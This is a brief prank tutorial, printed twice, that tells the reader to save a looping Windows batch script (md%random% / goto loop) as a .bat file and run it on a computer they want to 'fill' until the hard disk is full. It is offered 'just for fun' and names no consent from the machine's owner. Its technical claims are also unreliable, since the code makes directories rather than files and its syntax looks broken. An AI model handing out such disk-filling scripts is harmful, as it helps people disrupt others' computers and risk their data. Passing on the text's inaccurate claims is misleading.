It's just for fun!
It creates random number of files continuously until the hard disk is full.
1. Open notepad
2. Copy the following code and paste it into the notepad
:loop
md%random%
goto loop
3. Save this as .bat in the computer which you want it to get filled.
4. Run it. That's all
It creates random number of files continuously until the hard disk is full.
1. Open notepad
2. Copy the following code and paste it into the notepad
:loop
md%random%
goto loop
3. Save this as .bat in the computer which you want it to get filled.
4. Run it. That's all